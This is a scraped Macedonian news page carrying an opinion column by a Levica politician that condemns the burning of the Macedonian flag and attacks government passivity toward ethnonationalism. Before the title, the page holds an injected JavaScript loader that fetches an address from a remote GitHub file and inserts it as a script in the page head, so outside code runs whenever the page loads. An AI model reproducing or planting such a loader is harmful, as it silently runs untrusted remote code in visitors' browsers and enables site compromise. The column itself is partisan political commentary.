;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Омразата кон државните симболи – одраз на системска капитулација - Антропол
АктуелноСтав

Омразата кон државните симболи – одраз на системска капитулација

Колумна на Катерина Илиева, Политиколог, член на Левица – Сектор за Политички систем.

Инцидентот на палење на македонското знаме, симболот на Македонија, токму на „Денот на албанското знаме”, не е нов пример за системската неспособност на институциите за да ја заштитат државата и да обезбедат ред и мир. Овој чин, далеку од изолиран, е дел од поширок контекст на континуирано ерозирање на државниот суверенитет, охрабрен од политиките на клиентелизам и сервилност.

Во последните години, сведоци сме на серија исти и слични инциденти кои ги поткопуваат темелите на македонската државност и ја дестабилизираат општествената кохезија. Од кршењето на законите преку етнички предзнак до отвореното изигрување на институциите, владејачките структури во недостиг на конкретни решенија, а зборови во изобилие, дозволија националните симболи и институции да станат предмет на омаловажување и напади.

Институционалната навремена тишина е соучесник во поделбите!

Навремениот молк на надлежните институции и задоцнетите празни ветувања за инциденти како овој е само одраз на нивната неспособност и на намерната политика на пасивност пред агресивните етнонационалистички притисоци. Палењето на знамето, симбол на државниот суверенитет е само вандалски чин и директен удар врз достоинството на сите граѓани, без разлика на нивната етничка припадност.

Сиот тој спакуван дводневен театар е сигнал за прифаќање на политика која ги фаворизира етничките апетити на сметка на принципите на правдата, редот и државната целина. Пораките што ги испраќа владејачката гарнитура се јасни: не постои институционална волја за санкционирање на оние што ја дестабилизираат државата. Само празни ветувања.
И зошто велам е така?
Затоа што инцидентот не може да се гледа како изолиран. Тој е дел од низа провокации кои, наместо да бидат спречени добиваат премолчена поддршка преку институционалната незаинтересираност. Само во последните години сведоци сме на:
– уништување и потценување на државните симболи;
– неказнети акти на насилство врз државниот поредок;
– кршење на законите за употреба на јазиците и симболите на државата.

Секоја следна провокација го потврдува тоа што веќе го знаеме: системот не само што не го штити државното, туку намерно го релативизира значењето на националните темели.

Етноцентризмот кој доминира во политиките на владата ја поткопува кохезијата во мултиетничкото општество, создава платформа за нормализација на насилството врз државните симболи. Наместо политики што обединуваат, добиваме популизам кој поттикнува омраза и поделби.

Оваа политика, која се спроведува под маската на мултикултурализам, не е ништо друго освен прифаќање на двојни стандарди, кои во пракса доведуваат до привилегирање на една заедница на сметка на другите. Ваквата насока е погубна за стабилноста на државата и за иднината на сите граѓани кои ја гледаат Македонија како своја единствена татковина.

Македонското знаме не е само парче ткаенина драги сограѓани! Тоа е симбол на слободата, историјата и жртвите дадени за создавање на државата. Секое палење, уништување или омаловажување е  криминален чин и напад врз самата веќе застарена идеја за заедничка иднина.

Како општество, должни сме да се спротивставиме на ваквите деструктивни тенденции, во име на минатото и во име на иднината. Македонската држава не смее да биде жртва на етнонационализмот, а нејзините граѓани не смеат да бидат сведоци на нејзиното постепено исчезнување.
Секое следно сведоштво е срам за власта.